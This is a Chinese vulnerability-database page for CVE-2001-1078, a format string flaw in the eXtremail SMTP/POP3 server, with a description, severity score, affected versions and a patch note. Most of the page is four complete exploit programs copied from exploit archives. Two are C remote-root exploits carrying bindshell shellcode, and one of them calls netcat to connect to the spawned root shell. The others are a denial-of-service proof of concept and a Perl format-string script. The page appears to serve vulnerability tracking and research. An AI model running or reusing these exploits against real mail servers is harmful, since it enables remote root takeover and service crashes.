CVE-2001-1078
CVSS10.0
发布时间 :2001-06-21 00:00:00
修订时间 :2008-09-10 15:09:37
NMCOES    

[原文]Format string vulnerability in flog function of eXtremail 1.1.9 and earlier allows remote attackers to gain root privileges via format specifiers in the SMTP commands (1) HELO, (2) EHLO, (3) MAIL FROM, or (4) RCPT TO, and the POP3 commands (5) USER and (6) other commands that can be executed after POP3 authentication.


[CNNVD]eXtremail 远程格式串溢出(CNNVD-200106-114)

        CVE(CAN) ID: CAN-2001-1078
        
        
        
        eXtremail是一个pop3/smtpd邮件服务软件,它是免费的但是不开放源码。它可以运行在
        
        Linux和AIX系统下。
        
        
        
        eXtremail的flog()函数中存在一个格式串问题。用户可能利用SMTP或者POP3命令将格式串
        
        传送给服务器,攻击者可以修改任意的可访问的内存地址。
        
        
        
        由于eXtremail以root权限运行。远程攻击者可以远程获取root权限,也可能造成eXtremail
        
        服务的崩溃。
        
        
        
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:extremail:extremail:1.1.5
cpe:/a:extremail:extremail:1.0.1
cpe:/a:extremail:extremail:1.0.2
cpe:/a:extremail:extremail:1.0.3
cpe:/a:extremail:extremail:1.1.4
cpe:/a:extremail:extremail:1.1.7
cpe:/a:extremail:extremail:1.1
cpe:/a:extremail:extremail:1.0
cpe:/a:extremail:extremail:1.1.3
cpe:/a:extremail:extremail:1.1.1
cpe:/a:extremail:extremail:1.1.8
cpe:/a:extremail:extremail:1.1.2
cpe:/a:extremail:extremail:1.1.9
cpe:/a:extremail:extremail:1.1.6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1078
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1078
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-114
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/6733.php
(VENDOR_ADVISORY)  XF  extremail-flog-format-string(6733)
http://www.securityfocus.com/bid/2908
(VENDOR_ADVISORY)  BID  2908
http://www.extremail.com/news.htm
(UNKNOWN)  CONFIRM  http://www.extremail.com/news.htm
http://www.extremail.com/history.htm
(UNKNOWN)  CONFIRM  http://www.extremail.com/history.htm
http://archives.neohapsis.com/archives/bugtraq/2001-06/0291.html
(UNKNOWN)  BUGTRAQ  20010622 eXtremail Remote Format String ('s)

- 漏洞信息

eXtremail 远程格式串溢出
危急 输入验证
2001-06-21 00:00:00 2005-10-20 00:00:00
远程  
        CVE(CAN) ID: CAN-2001-1078
        
        
        
        eXtremail是一个pop3/smtpd邮件服务软件,它是免费的但是不开放源码。它可以运行在
        
        Linux和AIX系统下。
        
        
        
        eXtremail的flog()函数中存在一个格式串问题。用户可能利用SMTP或者POP3命令将格式串
        
        传送给服务器,攻击者可以修改任意的可访问的内存地址。
        
        
        
        由于eXtremail以root权限运行。远程攻击者可以远程获取root权限,也可能造成eXtremail
        
        服务的崩溃。
        
        
        
        

- 公告与补丁

        
        
        厂商补丁:
        
        
        
        eXtremail 1.1.10已经解决了这个问题:
        
        
        
        eXtremail upgrade i386 Linux (tarball):
        
        
        http://www.extremail.com/ftp/linux/eXtremail-1.1-10.tar.gz

        
        
        
        eXtremail upgrade i386 Linux (deb):
        
        
        http://www.extremail.com/ftp/linux/extremail_1.1-10_i386.deb

        
        
        
        eXtremail RPM i386 Linux (rpm):
        
        
        http://www.extremail.com/ftp/linux/eXtremail-1.1-10.i686.rpm

        
        
        

- 漏洞信息 (49)

Linux eXtremail 1.5.x Remote Format Strings Exploit (EDBID:49)
linux remote
2003-07-02 Verified
25 B-r00t
N/A [点击下载]
/****************************************************************/
/* 	    Linux eXtremail 1.5.x Remote Format Strings Exploit	                */
/*                                                           		                                */
/*							*/
/*      	                       By B-r00t - 02/07/2003			*/
/*							*/
/*	Versions:       Linux eXtremail-1.5-8 => VULNERABLE		*/
/*		    Linux eXtremail-1.5-5 => VULNERABLE		*/
/*	Exploit uses format strings bug in fLog() of smtpd to bind a 	*/
/*	r00tshell to port 36864 on the target eXtremail server.		*/
/*							*/
/****************************************************************/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

#define EXPLOIT "eXtreme"
#define DEST_PORT 25

// Prototypes
int get_sock (char *host);
int send_sock (char *stuff);
int read_sock (void);
void usage (void);
int do_it (void);

// Globals
int socketfd, choice;
unsigned long GOT, RET;
char *myip;
char helo[] = "HELO Br00t~R0x~Y3r~W0rld!\n";
char shellcode[] = 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";


struct {
        char *systemtype;
        unsigned long got;
        unsigned long ret;
        int pad;
        int buf;
        int pos;
} targets[] = {
	// Confirmed targets tested by B-r00t.
        { "RedHat 7.2 eXtremail V1.5 release 5 
(eXtremail-1.5-5.i686.rpm)",   0x0813b19c, 0xbefff1e8, 1, 266, 44},
        { "Linux ANY eXtremail V1.5 release 5 
(eXtremail-1.5-5.tar.gz)",   0x0813b19c, 0xbefff1b8, 1, 266, 44},
	{ "Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)",   0xbefff0c8, 
0xbefff1d4, 1, 266, 44},
        { "eXtremail V1.5 DEBUG",   0x44434241, 0xaaaaaaaa, 1, 266, 
44},
        { 0 } 
	};

int main ( int argc, char *argv[] )
{
char *TARGET = "TARGET";

printf ("\n%s by B-r00t <br00t@blueyonder.co.uk>. (c) 2003\n", 
EXPLOIT);

if (argc < 3) 
usage ();

choice = atoi(argv[2]);
if (choice < 0 || choice > 3) 
usage ();

setenv (TARGET, argv[1], 1);

get_sock(argv[1]);
sleep (1);
read_sock ();
sleep (1);
send_sock (helo);
sleep (1);
read_sock ();
sleep(1);
do_it ();
}


void usage (void)
{
        int loop;
	printf ("\nUsage: %s [IP_ADDRESS] [TARGET]", EXPLOIT);
        printf ("\nExample: %s 10.0.0.1 2 \n", EXPLOIT);
	for (loop = 0; targets[loop].systemtype; loop++)
			printf ("\n%d\t%s", loop, targets[loop].systemtype);
        printf ("\n\nOn success a r00tshell will be spawned on port 
36864.\n\n");
	exit (-1);
        }


int get_sock (char *host) 
{
struct sockaddr_in dest_addr;

if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("Socket Error!\n");
        exit (-1);
        }

dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
if (! inet_aton(host, &(dest_addr.sin_addr))) {
        perror("inet_aton problems\n");
        exit (-2);
        }

memset( &(dest_addr.sin_zero), '\0', 8);
if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct 
sockaddr)) == -1){
        perror("Connect failed!\n");
        close (socketfd);
        exit (-3);
        }
printf ("\n\nConnected to %s\n", host);
}



int send_sock (char *stuff) 
{
	int bytes;
        bytes = (send (socketfd, stuff, strlen(stuff), 0));
        if (bytes == -1) {
        perror("Send error");
        close (socketfd);
        exit(4);
	}
printf ("Send:\t%s", stuff);
return bytes;
}


int read_sock (void) 
{
        int bytes;
	char buffer[200];
	char *ptr;
	ptr = buffer;
	memset (buffer, '\0', sizeof(buffer));
        bytes = (recv (socketfd, ptr, sizeof(buffer), 0));
        if (bytes == -1) {
        perror("send error");
        close (socketfd);
        exit(4);
	}
printf ("Recv:\t%s", buffer);
return bytes;
}


int do_it (void)
{
char format[200], buf[500], *bufptr, *p;
int loop, sofar = 0;
int PAD = targets[choice].pad;
int POS = targets[choice].pos;
unsigned char r[3], g[3], w[3];

RET = targets[choice].ret;
r[0] = (int) (RET & 0x000000ff);
r[1] = (int)((RET & 0x0000ff00) >> 8);
r[2] = (int)((RET & 0x00ff0000) >> 16);
r[3] = (int)((RET & 0xff000000) >> 24);

GOT = targets[choice].got;
g[0] = (int) (GOT & 0x000000ff);
g[1] = (int)((GOT & 0x0000ff00) >> 8);
g[2] = (int)((GOT & 0x00ff0000) >> 16);
g[3] = (int)((GOT & 0xff000000) >> 24);


// Start buf
bufptr = buf;
bzero (bufptr, sizeof(buf));
strncpy (buf, "mail from: ", strlen("mail from: "));
sofar = 19;

// Do padding
for (loop=0; loop<PAD; loop++)
strncat (buf, "a", 1);
sofar = sofar+PAD;

//1st GOT addy
strncat (buf, g, 4);

//2nd GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);

// 3rd GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);

// 4th GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);
sofar = sofar+16;

for (loop=0; loop<4; loop++) {
			if (r[loop] > sofar) {
						w[loop] = r[loop]-sofar;
						} else
			if (r[loop] == sofar) {
						w[loop] = 0;
						}else
			if (r[loop] < sofar) {
						w[loop] = (256-sofar)+r[loop];
						}
			sofar = sofar+w[loop];
			}

bufptr = format;
bzero (bufptr, sizeof(format));
sprintf (bufptr, "%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n", 
w[0], POS, w[1], POS+1, w[2], POS+2, w[3], POS+3);
strncat (buf, format, sizeof(format));
strncat (buf, shellcode, sizeof(shellcode));

// Summarise
printf ("\nSystem type:\t\t%s", targets[choice].systemtype);
printf ("\nWrite Addy:\t\t0x%x", GOT);
printf ("\nRET (shellcode):\t0x%x", RET);
printf ("\nPAD (alignment):\t%d", PAD);
printf ("\nPayload:\t\t%d / %d max bytes", strlen(buf), 
targets[choice].buf);
printf ("\nSending it ... \n");
sleep(1);

// Ok lets Wack it!
send_sock (buf);
sleep (1);
close (socketfd);
printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864 
....!!!!!\n\n\n");
sleep(3); // May take time to spawn a shell
system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
exit (0);
}

// milw0rm.com [2003-07-02]
		

- 漏洞信息 (20952)

eXtremail 1.x/2.1 Remote Format String Vulnerability (1) (EDBID:20952)
linux dos
2001-06-21 Verified
0 Luca Ercoli
N/A [点击下载]
source: http://www.securityfocus.com/bid/2908/info

eXtremail is a freeware SMTP server available for Linux and AIX.

eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability.

eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.

UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.

UPDATE (October 26, 2007): Reports indicate that the 'USER' command of eXtremail 2.1.1 and prior is still vulnerable. Symantec has not confirmed this. 

/**********************************************
*  Proof of Concept                           *
*  eXtremail 1.5.x Denial of Service          *
*                                             *
*  Luca Ercoli  <luca.e [at] seeweb.com>      *
*  Seeweb          http://www.seeweb.com      *
*                                             *
***********************************************/

#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 143
#define MAXRECVSIZE 100


int main(int argc, char *argv[]);
void crash(char *host,int TYPE);


int numbytes;



void crash(char *host,int TYPE)
{

 int sockfd;
 char buf[MAXRECVSIZE];
 struct hostent *he;
 struct sockaddr_in their_addr;
 char poc[]="1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n";


  if ((he=gethostbyname(host)) == NULL)
     {
      perror("gethostbyname");
      exit(1);
     }

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
     {
      perror("socket");
      exit(1);
     }

 their_addr.sin_family = AF_INET;
 their_addr.sin_port = htons(PORT);
 their_addr.sin_addr = *((struct in_addr *)he->h_addr);
 memset(&(their_addr.sin_zero), '\0', 8);

  if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
     {
      perror("connect");
      exit(1);
     }


  if ((numbytes=recv(sockfd, buf, MAXRECVSIZE-1, 0)) == -1)
     {
      perror("recv");
      exit(1);
     }

 buf[numbytes] = '\0';

  if (TYPE == 0)
     {
      printf("[+] Server -> %s",buf);
      sleep(1);
      printf("\n[!] Sending malicious packet...\n");

      send(sockfd,poc, strlen(poc), 0);
      sleep(1);
      printf ("\n[+] Sent!\n");
     }

 close(sockfd);

}



int main(int argc, char *argv[])
{

 printf("\n\n  eXtremail 1.5.x Denial of Service  \n");
 printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n");


  if (argc != 2)
   {
    fprintf(stderr,"\nUsage -> %s hostname\n\n",argv[0]);
    exit(1);
   }

 crash(argv[1],0);
 numbytes=0;
 printf ("\n[+] Checking server status ...\n");


 if(!fork()) crash(argv[1],1);
 sleep(5);
 if (numbytes == 0) printf ("\n[!] Smtpd/Pop3d/Imapd/Remt crashed!\n\n\n");

 return 0;


}

		

- 漏洞信息 (20953)

eXtremail 1.x/2.1 Remote Format String Vulnerability (2) (EDBID:20953)
linux remote
2001-06-21 Verified
0 mu-b
N/A [点击下载]
source: http://www.securityfocus.com/bid/2908/info
 
eXtremail is a freeware SMTP server available for Linux and AIX.
 
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability.
 
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
 
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
 
UPDATE (October 26, 2007): Reports indicate that the 'USER' command of eXtremail 2.1.1 and prior is still vulnerable. Symantec has not confirmed this. 

/* eXtremail-exp.c
 *
 * - eXtremail v1.1.5-9 Remote Root Exploit (x86) -
 *
 * - Tested on: RedHat 7.0 eXtremail v1.1.5
 *              RedHat 7.0 eXtremail v1.1.6
 *              RedHat 7.0 eXtremail v1.1.7
 *              RedHat 7.0 eXtremail v1.1.8
 *              RedHat 7.0 eXtremail v1.1.9
 *              NOT VULNERABLE eXtremail v1.1.10
 *
 * Copyright (c) 2001 by <mu-b@digit-labs.org>
 *
 * eXtremail v1.1.5+ has a format string problem
 * in flog(). This problem affects all user commands
 * (helo/ehlo/mail from:/rcpt to:), and is caused
 * by an improper fprintf() to the servers logfile.
 *
 * Buffers for helo/ehlo are too small (except v1.1.5),
 * therefore we use mail from: instead :). 
 *
 * Note: Return Address's are quite tight due to the small
 *       buffers. Returning to the Heap is possible but
 *       is VERY unstable.
 *
 * Greets: mjm, all@alldas.de, teleh0r, grazer, cmds, gollum, #!digit-labs
 *
 * http://www.digit-labs.org/ -- Digit-Labs 2001!@$!
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <resolv.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/stat.h>

#define NOP		0x41
#define NUMVULN	4
#define OFFSET	0
#define PORT	25

void banner();
void mkfmt();
int opensocket(char *);
void usage();

char buf[520];
int buflength, type = 0, sock;
unsigned long target, retaddr;

unsigned char shellcode[]= /* lamagra bindshell code */
	"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
	"\x40\x89\xc3\x89\x46\x0c\x40\x89"
    	"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
    	"\x80\x43\xc6\x46\x10\x10\x88\x46"
    	"\x08\x31\xc0\x31\xd2\x89\x46\x18"
    	"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
    	"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
    	"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
    	"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
    	"\x56\x10\xb0\x66\x43\xcd\x80\x86"
    	"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
    	"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
    	"\x80\x88\x56\x07\x89\x76\x0c\x87"
    	"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
    	"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
    	"\x6e\x2f\x73\x68";

/*   target address's  -> objdump -R smtpd | grep "fflush"   */
struct {
	char *name;
	unsigned long target;
	unsigned long retaddr;
	int padding;
	int buflength;
} targets[] = {
        { "RedHat 7.0 eXtremail v1.1R5", 0x080864e0, 0xbf1ff64a, 1, 500},
        { "RedHat 7.0 eXtremail v1.1R6", 0x08089d5c, 0xbf1ff5d6, 1, 266},
        { "RedHat 7.0 eXtremail v1.1R7", 0x0808b3fc, 0xbf1ff5d6, 1, 266},
        { "RedHat 7.0 eXtremail v1.1R8", 0x0808b6fc, 0xbf1ff5d6, 1, 266},
        { "RedHat 7.0 eXtremail v1.1R9", 0x08088890, 0xbf1ff5d6, 1, 266},
        { 0 } };

void banner()
{
   fprintf(stderr, "\neXtremail V1.1R5-9 remote root exploit\n");
   fprintf(stderr, "by: <mu-b@digit-labs.org>\n");
   fprintf(stderr, "Copyright (c) 2001 Digit-Labs!@#$!\n");
   fprintf(stderr, "http://www.digit-labs.org\n\n");
}

void mkfmt()
{
   int i, j = 0, num;
   int bytesofar;
   int fmtints[4];
   char *bufptr;
   unsigned char temp[4];

   bytesofar = 35 + targets[type].padding;
   bufptr = &buf[strlen(buf)];

   temp[0] = (unsigned char) (target & 0x000000ff);
   temp[1] = (unsigned char)((target & 0x0000ff00) >> 8);
   temp[2] = (unsigned char)((target & 0x00ff0000) >> 16);
   temp[3] = (unsigned char)((target & 0xff000000) >> 24);

   for(i = 0; i < 4; i++)
   {
      sprintf(bufptr, "%c%c%c%c", temp[0], temp[1], temp[2], temp[3]);
      bufptr += 4;
      temp[0]++;
   }

   fmtints[0] = (int) (retaddr & 0x000000ff);
   fmtints[1] = (int)((retaddr & 0x0000ff00) >> 8);
   fmtints[2] = (int)((retaddr & 0x00ff0000) >> 16);
   fmtints[3] = (int)((retaddr & 0xff000000) >> 24);
   
   for(i = 0; i < 4; i++)
   {
      num = 0;

      if(fmtints[i] - bytesofar < 10)
      {
         while(num != 1)
         {
            fmtints[i] = (fmtints[i] + 0x100);
            if(fmtints[i] - bytesofar > 9)
            {
               fmtints[i] -= bytesofar;
               bytesofar += fmtints[i];
               num = 1;
            }
         }
      }
      else
      {
         fmtints[i] -= bytesofar;
         bytesofar += fmtints[i];
      }
   }

   sprintf(bufptr, "%%.%du%%38$n%%.%du%%39$n%%.%du%%40$n%%.%du%%41$n", fmtints[0], fmtints[1], fmtints[2], fmtints[3]);

   for(i = strlen(buf); i < buflength - strlen(shellcode) - 1; i++)
      buf[i] = NOP;

   for(i = i; i < buflength - 1; i++)
   {
      buf[i] = shellcode[j];
      j++;
   }

   buf[buflength - 1] = '\n';
   buf[buflength] = '\0';
   write(sock, buf, strlen(buf));
}

int opensocket(char *host)
{
   int s;
   struct sockaddr_in remote_sin;
   struct hostent *he;

   if((s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
      perror("socket()");
      return -1;
   }

   memset((char *)&remote_sin, 0, sizeof(remote_sin));
   if((he = gethostbyname(host)) != NULL)
      memcpy((char *)&remote_sin.sin_addr, he->h_addr, he->h_length);
   else if((remote_sin.sin_addr.s_addr = inet_addr(host)) < 0) {
         perror("gethostbyname()/inet_addr()");
         return -1;
   }

   remote_sin.sin_family = PF_INET;
   remote_sin.sin_port = htons(PORT);

   if(connect(s, (struct sockaddr *)&remote_sin, sizeof(remote_sin)) == -1) {
      perror("connect()");
      close(s);
      return -1;
   }
	      
   return s;
}

void usage()
{
   int i;

   fprintf(stderr, "Usage: ./extremail <host> [type]\n");
   fprintf(stderr, "\nTargets:\n");

   for (i = 0; targets[i].name; i++)
      fprintf(stderr, "\t%d.\t%s\n", i, targets[i].name);

   fprintf(stderr, "\n");	
   exit(0);
}

int main (int argc, char *argv[])
{
   char *host;
   int i;

   banner();

   if(argc < 2)
      usage();
  
   if(argc >= 3)
      type = atoi(argv[2]);

   if(type > NUMVULN)
      type = 0;
   
   host = argv[1];
   buflength = targets[type].buflength;
   target = targets[type].target;
   retaddr = targets[type].retaddr + OFFSET;

   fprintf(stderr, "Target:\t\t%s\nType:\t\t%s\n", host, targets[type].name);
   fprintf(stderr, "Target Address:\t%p\nReturn Address:\t%p\nOffset:\t\t%d\n", target, retaddr, OFFSET);
   fprintf(stderr, "Buflength:\t%d\n", buflength);   

   if ((sock = opensocket(host)) <= 0)
      return -1;

   fprintf(stderr, "\nConnected....\n");

   memcpy(buf, "MAIL FROM:<", 11);
   
   for(i = 0; i < targets[type].padding; i++)
      buf[strlen(buf)] = 0x61;

   sleep(1);
   write(sock, "HELO digit-labs.org!@#$!\n", 26);

   sleep(1);
   mkfmt();

   sleep(1);
   close(sock);

   fprintf(stderr, "\n[1] sent payload....\n");
   fprintf(stderr, "[2] waiting....\n");
   sleep(2);
   fprintf(stderr, "[3] nc %s 36864 for shell....\n\n", host);

   return;
}
		

- 漏洞信息 (20954)

eXtremail 1.x/2.1 Remote Format String Vulnerability (3) (EDBID:20954)
linux remote
2006-10-06 Verified
0 mu-b
N/A [点击下载]
source: http://www.securityfocus.com/bid/2908/info
  
eXtremail is a freeware SMTP server available for Linux and AIX.
  
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability.
  
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
  
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
  
UPDATE (October 26, 2007): Reports indicate that the 'USER' command of eXtremail 2.1.1 and prior is still vulnerable. Symantec has not confirmed this. 

#!/usr/bin/perl
#
# extremail-v3.pl
#
# Copyright (c) 2006 by <mu-b@digit-labs.org>
#
# eXtremail <=2.1.1 remote root POC (x86-lnx)
# by mu-b - Fri Oct 06 2006
#
# Tested on: eXtremail 2.1.1 (lnx)
#            eXtremail 2.1.0 (lnx)
#
#    - Private Source Code -DO NOT DISTRIBUTE -
# http://www.digit-labs.org/ -- Digit-Labs 2006!@$!
########

use Getopt::Std; getopts('t:n:u:p:', \%arg);
use Socket;

&print_header;

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { &usage; }

my $pop3_port = 110;
my $send_delay = 1;

my $NOP = 'A';

srand(time());
while (1) {
    if (connect_host($target, $pop3_port)) {
        # [0,50) -> [1,50]
        $max_len  = int(rand(50) + 1);

        # [0, $max_len * 0.75) -> [0, ($max_len * 0x75) - 1]
        $pad1_len = int(rand($max_len * 0.75));

        # [0, ($max_len - $pad1_len)/2) -> [1, ($max_len - $pad1_len)/2]
        $pad2_len = int(rand(($max_len - $pad1_len)/length("%s")) + 1);

        $pad3_len = $max_len - $pad1_len - ($pad2_len * length("%s"));

        $buf = "USER ".
               ($NOP x $pad1_len).
               ("%s" x $pad2_len).
               ($NOP x $pad3_len).
               "\n";
        print("-> * Sending: $max_len $pad1_len $pad2_len $pad3_len 
".$buf);
        send(SOCKET, $buf, 0);
        sleep($send_delay);

        close(SOCKET);
    }
}

sub print_header {
    print("eXtremail <=2.1.1 remote root POC (x86-lnx)\n");
    print("by: <mu-b\@digit-labs.org>\n");
    print("http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
}

sub usage {
  print(qq(Usage: $0 -t <hostname>

     -t <hostname>    : hostname to test
));

    exit(1);
}

sub connect_host {
    ($target, $port) = @_;
    $iaddr  = inet_aton($target)                 || die("Error: $!\n");
    $paddr  = sockaddr_in($port, $iaddr)         || die("Error: $!\n");
    $proto  = getprotobyname('tcp')              || die("Error: $!\n");

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr)                      || die("Error: $!\n");
    return(1338);
}
		

- 漏洞信息

14147
eXtremail Multiple SMTP Command flog Function Format String
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-06-22 Unknow
2001-06-22 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

eXtremail Remote Format String Vulnerability
Input Validation Error 2908
Yes No
2001-06-21 12:00:00 2007-10-26 09:36:00
Discovered by mu-b <mu-b@digit-labs.org>.

- 受影响的程序版本

eXtremail eXtremail 2.1.1
eXtremail eXtremail 1.5.9
eXtremail eXtremail 1.5 -8
eXtremail eXtremail 1.5 -5
eXtremail eXtremail 1.5
eXtremail eXtremail 1.1.9
eXtremail eXtremail 1.1.8
eXtremail eXtremail 1.1.7
eXtremail eXtremail 1.1.6
eXtremail eXtremail 1.1.5
eXtremail eXtremail 1.1.4
eXtremail eXtremail 1.1.3
eXtremail eXtremail 1.1.2
eXtremail eXtremail 1.1.1
eXtremail eXtremail 1.1
eXtremail eXtremail 1.0.3
eXtremail eXtremail 1.0.2
eXtremail eXtremail 1.0.1
eXtremail eXtremail 1.0
eXtremail eXtremail 2.1
eXtremail eXtremail 1.1.10

- 不受影响的程序版本

eXtremail eXtremail 1.1.10

- 漏洞讨论

eXtremail is a freeware SMTP server available for Linux and AIX.

eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability.

eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.

UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.

UPDATE (October 26, 2007): Reports indicate that the 'USER' command of eXtremail 2.1.1 and prior is still vulnerable. Symantec has not confirmed this.

- 漏洞利用

Exploit code supplied by mu-b <mu-b@digit-labs.org>.

A second exploit has been released by B-r00t <br00t@blueyonder.co.uk>.

A proof-of-concept exploit has been released for eXtremail 1.5.9.

- 解决方案

Reportedly, eXtremail 1.5-9 fixes this vulnerability.

UPDATE (October 26, 2007): Reports indicate that the 'USER' command of eXtremail 2.1.1 and prior is still vulnerable. Symantec has not confirmed this.


eXtremail eXtremail 1.0

eXtremail eXtremail 1.0.1

eXtremail eXtremail 1.0.2

eXtremail eXtremail 1.0.3

eXtremail eXtremail 1.1

eXtremail eXtremail 1.1.1

eXtremail eXtremail 1.1.2

eXtremail eXtremail 1.1.3

eXtremail eXtremail 1.1.4

eXtremail eXtremail 1.1.5

eXtremail eXtremail 1.1.6

eXtremail eXtremail 1.1.7

eXtremail eXtremail 1.1.8

eXtremail eXtremail 1.1.9

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站